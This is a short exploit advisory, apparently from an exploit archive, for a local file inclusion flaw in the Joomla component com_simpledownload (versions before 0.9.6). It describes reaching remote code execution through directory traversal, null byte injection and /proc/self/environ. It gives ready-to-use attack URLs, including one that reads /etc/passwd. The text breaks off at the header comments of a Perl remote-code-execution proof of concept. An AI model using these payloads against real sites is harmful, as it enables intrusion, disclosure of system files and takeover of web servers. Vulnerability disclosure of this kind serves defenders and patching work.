|
--[Description]--
A vulnerability has been found in the downloader component for Joomla. It can be exploited in various ways - from sensitive information disclosure to remote code execution.
Input passed to controller is not properly sanitized, allowing attacker to inject php code
via Local File Inclusion combined with Directory Traversal (/proc/self/environ method) and Null Byte Injection, leading to Remote Code Execution.
--[Vendor]--
http://joomla.joelrowley.com/
--[Vulnerable Version]--
com_simpledownload <0.9.6
--[Impact]--
Local File Inclusion
Directory Traversal
Remote Code Execution
--[LFI Exploit]--
/index2.php?option=com_simpledownload&controller=[LFI]%00
--[LFI PoC]--
/index2.php?option=com_simpledownload&controller./../../../../../../../etc/passwd%00
--[RCE PoC]--
#!/usr/bin/perl -w
# quick'n'dirty PoC for RCE
# com_simpledownload <0.9.6
# by